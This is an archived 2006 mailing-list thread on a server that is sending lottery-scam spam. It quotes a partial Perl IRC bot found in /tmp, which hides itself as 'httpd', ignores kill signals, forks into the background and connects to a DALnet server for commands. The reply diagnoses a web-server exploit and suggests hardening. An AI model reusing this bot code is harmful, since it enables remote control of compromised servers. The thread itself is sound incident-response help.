Postfix Problems

[Paul Howarth]

CodeHeads wrote:
>> There is something wrong but I cannot nail it down.
>>
>> I am receiving hundreds of bounce backs from the web server I am running.  Not
>> sure how they are sending mail.  The only mail that should be sent is from
>> forms.  Here is a header of one of queues.  Maybe someone has run into this.
>>
>> V8
>> T1147739033
>> K1147739138
>> N1
>> P34672
>> Mhost map: lookup (zdnetmail.com): deferred
>> F8bs
>> $_apache at localhost
>> ${daemon_flags}c u
>> Sapache
>> Aapache at code-heads.com
>> rRFC822; galactica7 at zdnetmail.com
>> RPFD:galactica7 at zdnetmail.com
>> H?P?Return-Path: <<81>g>
>> H??Received: (from apache at localhost)
>>         by code-heads.com (8.13.4/8.13.4/Submit) id k4G0NrpQ017524;
>>         Mon, 15 May 2006 20:23:53 -0400
>> H?D?Date: Mon, 15 May 2006 20:23:53 -0400
>> H?x?Full-Name: Apache
>> H?M?Message-Id: <200605160023.k4G0NrpQ017524 at code-heads.com>
>> H??To: galactica7 at zdnetmail.com
>> H??Subject: WINNING NOTIFICATION
>> H??From: NATIONAL LOTTERY <claimsagent_2006_2007 at yahoo.co.uk>
>>
>> What is bothering me is this:
>> by code-heads.com (8.13.4/8.13.4/**Submit**) id k4G0NrpQ017524;

Right, that should tell you that the mail headers you are looking at 
seem to be generated by something running as user apache (probably a 
CGI/PHP script of some kind running via your web server), which is 
calling the local sendmail on that server to send the mail out. It's 
nothing to do with postfix at all.

> Sorry again, but looky what I found in the /tmp dir:
> The whole thing is not copy and pasted:
> #!/usr/bin/perl
> # r00t teh pl4net! gr33t t0 Myhack at DALnet
> # ------[eof]-----
> 
> 
> 
> system("kill -9 `ps ax |grep /var/tmp/wops/is |grep -v grep|awk '{print
> $1;}'`");
> 
> 
> my $processo = 'httpd';
> 
> # morgan the code that you need to rip ends here
> 
> my @titi = ("Cube-|");
> 
> my $sleep='5';
> my $linas_max='4';
> my @adms=("apaii","KingFighter");
> my @hostauth=("roundtable.cif.rochester.edu","202.142.215.209");
> my @canais=("#conn");
> my $nick=  $titi[rand scalar @titi];
> my $ircname =  $titi[rand scalar @titi];
> chop (my $realname = $titi[rand scalar @titi]);
> 
> $servidor='rumble.dal.net' unless $servidor;
> my $porta='6667';
> my $VERSAO = '0.5';
> $SIG{'INT'} = 'IGNORE';
> $SIG{'HUP'} = 'IGNORE';
> $SIG{'TERM'} = 'IGNORE';
> $SIG{'CHLD'} = 'IGNORE';
> $SIG{'PS'} = 'IGNORE';
> use IO::Socket;
> use Socket;
> use IO::Select;
> chdir("/");
> $servidor="$ARGV[0]" if $ARGV[0];
> $0="$processo"."\0"x16;;
> my $pid=fork;
> exit if $pid;
> die "Problema com o fork: $!" unless defined($pid);
> 
> our %irc_servers;
> our %DCC;
> my $dcc_sel = new IO::Select->new();
> 
> $sel_cliente = IO::Select->new();
> sub sendraw {
>   if ($#_ == '1') {
>     my $socket = $_[0];
>     print $socket "$_[1]\n";
>   } else {
>       print $IRC_cur_socket "$_[0]\n";
>   }
> }
> 
> sub conectar {
>    my $meunick = $_[0];
>    my $servidor_con = $_[1];
>    my $porta_con = $_[2];
> 
>    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp",
> PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1); if
> (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket;
> 
> What I cannot understand is how someone can upload to the tmp dir.  I guess I
> am still learning.  Can someone shed some light on this?

This is communicating with an IRC server, probably to listen for commands.

Look at the owner of the script. If it's apache, you can safely say that 
a webserver exploit was used to upload it. You could try looking at the 
timestamp of the file, and look in your web server log files for 
suspicious activity at around that time to get a clue as to how it got 
there.

If you have /tmp on a separate partition, I'd seriously consider 
mounting it noexec,nodev. If it's not a separate partition, I'd 
seriously consider making one for it on an Internet-exposed web server. 
Same goes for /var.

Paul.